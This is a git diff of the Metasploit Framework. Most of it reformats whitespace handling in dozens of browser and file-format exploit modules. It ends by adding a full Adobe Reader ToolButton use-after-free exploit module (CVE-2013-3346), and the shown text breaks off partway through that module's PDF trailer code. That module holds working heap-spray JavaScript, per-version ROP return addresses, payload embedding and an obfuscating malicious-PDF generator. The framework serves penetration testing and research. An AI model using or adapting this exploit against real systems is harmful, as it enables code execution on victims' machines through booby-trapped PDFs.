a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 5620423d7f..7ea0cc7822 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index 9675fe109f..01864436ff 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 46288f4495..00e85c8625 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 655ef1c01b..b3f677f8cc 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -276,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index 3dd6276e58..5670eedd15 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index e28b1164c9..5d37af6bee 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name}") #Remove the extra tabs from content - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index 4adf8e04eb..0a77eb0dbf 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 96b4da2fd2..8399836c1d 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -339,7 +339,7 @@ class Metasploit3 < Msf::Exploit::Remote HTML #Remove the extra tabs - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response_html(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 85fe5fc09c..8c683e58c7 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote obj.reduceRight(f,1,2,3); JS - js = js.gsub(/^\t\t/, '') + js = js.gsub(/^ {4}/, '') if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) @@ -313,7 +313,7 @@ class Metasploit3 < Msf::Exploit::Remote js.obfuscate end - js = js.gsub(/^\t\t/, '') + js = js.gsub(/^ {4}/, '') html = <<-HTML @@ -330,7 +330,7 @@ class Metasploit3 < Msf::Exploit::Remote end - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index 0b28e93e2a..1b3cb2c0a7 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t\t/, '') + html = html.gsub(/^ {6}/, '') print_status("Sending trigger loader") send_response_html(cli, html) @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response_html(cli, html) diff --git a/modules/exploits/windows/browser/ms11_081_option.rb b/modules/exploits/windows/browser/ms11_081_option.rb index 9703762a92..8616601c5b 100644 --- a/modules/exploits/windows/browser/ms11_081_option.rb +++ b/modules/exploits/windows/browser/ms11_081_option.rb @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index f9b87db448..61681e8f84 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 7fb9beb1b4..fe074d86ee 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -323,7 +323,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index f1bfe4d198..787568d2dd 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html = html.gsub(/^\t\t\t/, '') + html = html.gsub(/^ {6}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index 06870bad31..e4b2c478cb 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = get_exploit(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status "Sending HTML..." send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 54eaade4f4..8dc9aa65a7 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -132,18 +132,18 @@ class Metasploit3 < Msf::Exploit::Remote # Land the payload at 0x0c0c0c0c # For IE 8 js = %Q| - var heap_obj = new heapLib.ie(0x20000); - var code = unescape("#{js_code}"); - var nops = unescape("#{js_nops}"); - while (nops.length < 0x80000) nops += nops; - var offset = nops.substring(0, #{my_target['Offset']}); - var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); - while (shellcode.length < 0x40000) shellcode += shellcode; - var block = shellcode.substring(0, (0x80000-6)/2); - heap_obj.gc(); - for (var i=1; i < 0x300; i++) { - heap_obj.alloc(block); - } +var heap_obj = new heapLib.ie(0x20000); +var code = unescape("#{js_code}"); +var nops = unescape("#{js_nops}"); +while (nops.length < 0x80000) nops += nops; +var offset = nops.substring(0, #{my_target['Offset']}); +var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); +while (shellcode.length < 0x40000) shellcode += shellcode; +var block = shellcode.substring(0, (0x80000-6)/2); +heap_obj.gc(); +for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); +} | js = heaplib(js, {:noobfu => true}) @@ -398,7 +398,6 @@ function exploit(){ if my_target['Rop'] == :ntdll and request.uri !~ /#{@second_stage_url}/ html = html_info_leak - html = html.gsub(/^\t\t/, '') print_status("Sending HTML to info leak...") send_response(cli, html, {'Content-Type'=>'text/html'}) else @@ -410,7 +409,6 @@ function exploit(){ if leak == 0 html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) return @@ -433,7 +431,6 @@ function exploit(){ end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') print_status("Sending HTML to trigger...") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb index 3dc110190f..df3b0b3db1 100644 --- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb +++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html.gsub(/^\t\t/, '') + html.gsub(/^ {4}/, '') end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index a3e72cfba2..a821d4759c 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index 525d35a2e9..f5efd9b11a 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -269,7 +269,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/ntr_activex_check_bof.rb b/modules/exploits/windows/browser/ntr_activex_check_bof.rb index c81002c946..9b72d04c9f 100644 --- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb +++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb @@ -351,7 +351,7 @@ class Metasploit3 < Msf::Exploit::Remote MYHTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb index e89149310c..b7d998d5e8 100644 --- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb +++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb @@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote MYHTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb index 5f74c9936d..0da727daa7 100644 --- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb +++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb @@ -396,7 +396,7 @@ class Metasploit3 < Msf::Exploit::Remote MYHTML - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index 222f1a8c9d..e047abf83d 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -122,7 +122,7 @@ function main(){ } EOS - js = js.gsub(/^\t\t/, '') + js = js.gsub(/^ {4}/, '') #JS obfuscation on demand if datastore['OBFUSCATE'] @@ -146,7 +146,7 @@ EOS EOS #Remove the extra tabs from content - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response(cli, content, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index 3cea1eed63..8e173c5c33 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -258,7 +258,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target, cli) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index 8d0f0d210b..e5b96fb70d 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS # Remove extra tabs - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending #{self.name}") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 0c791ad2ba..de85d92d8b 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Clear the extra tabs - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') print_status("Sending #{self.name}") send_response(cli, content, {'Content-Type'=>'application/xml'}) diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index 719345cacf..63cf7eca1c 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index a4d80dd326..37f3aeeb95 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -490,7 +490,7 @@ class Metasploit3 < Msf::Exploit::Remote end html = load_exploit_html(my_target) - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb index f5d995cced..39741a0c92 100644 --- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb +++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb @@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote | - html.gsub(/^\t\t/, '') + html.gsub(/^ {4}/, '') end def on_request_uri(cli, request) diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index fae74d499f..4f9d7207c5 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -254,7 +254,7 @@ EOS print_status("Sending #{self.name}") #Remove the extra tabs from content - content = content.gsub(/^\t\t/, '') + content = content.gsub(/^ {4}/, '') # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index 4203774adc..a749d68d7e 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote var nops_padding = nops.substring(0, 0x73e-code.length-offset.length); var shellcode = code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length); JS_ROP - js_shellcode = js_shellcode.gsub(/^\t\t\t/, '') + js_shellcode = js_shellcode.gsub(/^ {6}/, '') end js = <<-JS @@ -251,7 +251,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, '') + html = html.gsub(/^ {4}/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index d04c5b861d..b148521ae9 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Remove extra tabs in HTML - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending #{self.name}") send_response( cli, html, {'Content-Type' => 'text/html'} ) diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 47a9522a3d..824118ffaa 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS #Remove extra tabs in HTML - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending malicious page") send_response( cli, html, {'Content-Type' => 'text/html'} ) diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 4b4acb6a71..3f5754b19c 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS # Remove extra tabs - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending #{self.name}") send_response(cli, html, { 'Content-Type' => 'text/html' }) diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index 4856058e0a..20cc15e315 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -268,7 +268,7 @@ class Metasploit3 < Msf::Exploit::Remote this.pageNum = 2; JS - js = js.gsub(/^\t\t/,'') + js = js.gsub(/^ {4}/,'') if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) @@ -315,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote | - xml = xml.gsub(/^\t\t/, '') + xml = xml.gsub(/^ {4}/, '') return xml end diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb new file mode 100644 index 0000000000..ec62fc7114 --- /dev/null +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -0,0 +1,361 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::RopDb + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe Reader ToolButton Use After Free', + 'Description' => %q{ + This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where + the cEnable callback can be used to early free the object memory. Later use of the object + allows triggering the use after free condition. This module has been tested successfully + on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in + November, 2013. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Soroush Dalili', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-3346' ], + [ 'OSVDB', '96745' ], + [ 'ZDI', '13-212' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], + [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP / Adobe Reader 9/10/11', { }], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Aug 08 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + end + + def exploit + js_data = make_js + + # Create the pdf + pdf = make_pdf(js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + file_create(pdf) + end + + + def make_js + + # CreateFileMappingA + MapViewOfFile + memcpy rop chain + rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' })) + rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) + rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) + escaped_payload = Rex::Text.to_unescape(payload.encoded) + + js = %Q| +function heapSpray(str, str_addr, r_addr) { + var aaa = unescape("%u0c0c"); + aaa += aaa; + while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; + var i1 = r_addr - 0x24; + var bbb = aaa.substring(0, i1 / 2); + var sa = str_addr; + while (sa.length < (0x0c0c - r_addr)) sa += sa; + bbb += sa; + bbb += aaa; + var i11 = 0x0c0c - 0x24; + bbb = bbb.substring(0, i11 / 2); + bbb += str; + bbb += aaa; + var i2 = 0x4000 + 0xc000; + var ccc = bbb.substring(0, i2 / 2); + while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; + var i3 = (0x1020 - 0x08) / 2; + var ddd = ccc.substring(0, 0x80000 - i3); + var eee = new Array(); + for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; + return; +} +var shellcode = unescape("#{escaped_payload}"); +var executable = ""; +var rop9 = unescape("#{rop_9}"); +var rop10 = unescape("#{rop_10}"); +var rop11 = unescape("#{rop_11}"); +var r11 = false; +var vulnerable = true; + +var obj_size; +var rop; +var ret_addr; +var rop_addr; +var r_addr; + +if (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) { + obj_size = 0x330 + 0x1c; + rop = rop9; + ret_addr = unescape("%ua83e%u4a82"); + rop_addr = unescape("%u08e8%u0c0c"); + r_addr = 0x08e8; +} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { + obj_size = 0x360 + 0x1c; + rop = rop10; + rop_addr = unescape("%u08e4%u0c0c"); + r_addr = 0x08e4; + ret_addr = unescape("%ua8df%u4a82"); +} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { + r11 = true; + obj_size = 0x370; + rop = rop11; + rop_addr = unescape("%u08a8%u0c0c"); + r_addr = 0x08a8; + ret_addr = unescape("%u8003%u4a84"); +} else { + vulnerable = false; +} + +if (vulnerable) { + var payload = rop + shellcode; + heapSpray(payload, ret_addr, r_addr); + + var part1 = ""; + if (!r11) { + for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); + } + part1 += rop_addr; + var part2 = ""; + var part2_len = obj_size - part1.length * 2; + for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); + var arr = new Array(); + + removeButtonFunc = function () { + app.removeToolButton({ + cName: "evil" + }); + + for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); + } + + addButtonFunc = function () { + app.addToolButton({ + cName: "xxx", + cExec: "1", + cEnable: "removeButtonFunc();" + }); + } + + app.addToolButton({ + cName: "evil", + cExec: "1", + cEnable: "addButtonFunc();" + }); +} +| + + js + end + + def RandomNonASCIIString(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def ioDef(id) + "%d 0 obj \n" % id + end + + def ioRef(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def nObfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ASCIIHexWhitespaceEncode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(js) + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << RandomNonASCIIString(4) << eol + + # catalog + xref << pdf.length + pdf << ioDef(1) << nObfu("<<") << eol + pdf << nObfu("/Pages ") << ioRef(2) << eol + pdf << nObfu("/Type /Catalog") << eol + pdf << nObfu("/OpenAction ") << ioRef(4) << eol + # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load + pdf << nObfu("/AcroForm ") << ioRef(6) << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << ioDef(2) << nObfu("<<") << eol + pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol + pdf << nObfu("/Count 1") << eol + pdf << nObfu("/Type /Pages") << eol + pdf << nObfu(">>") << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << ioDef(3) << nObfu("<<") << eol + pdf << nObfu("/Parent ") << ioRef(2) << eol + pdf << nObfu("/Type /Page") << eol + pdf << nObfu(">>") << eol # end obj dict + pdf << endobj + + # js action + xref << pdf.length + pdf << ioDef(4) << nObfu("<<") + pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) + pdf << nObfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) + pdf << ioDef(5) << nObfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll / icucnv40.dll to load + ### + + # form object + xref << pdf.length + pdf << ioDef(6) + pdf << nObfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << ioDef(7) << nObfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll / icucnv40.dll + ### + + + # trailing stuff + xrefPosition = pdf.length + pdf << "xref" << eol + pdf << "0 %d" % (xref.length + 1) << eol + pdf << "0000000000 65535 f" << eol + xref.each do |index| + pdf << "%010d 00000 n" % index << eol + end + + pdf << "trailer" << eol + pdf << nObfu("<>" << eol + + pdf << "startxref" << eol + pdf << xrefPosition.to_s() << 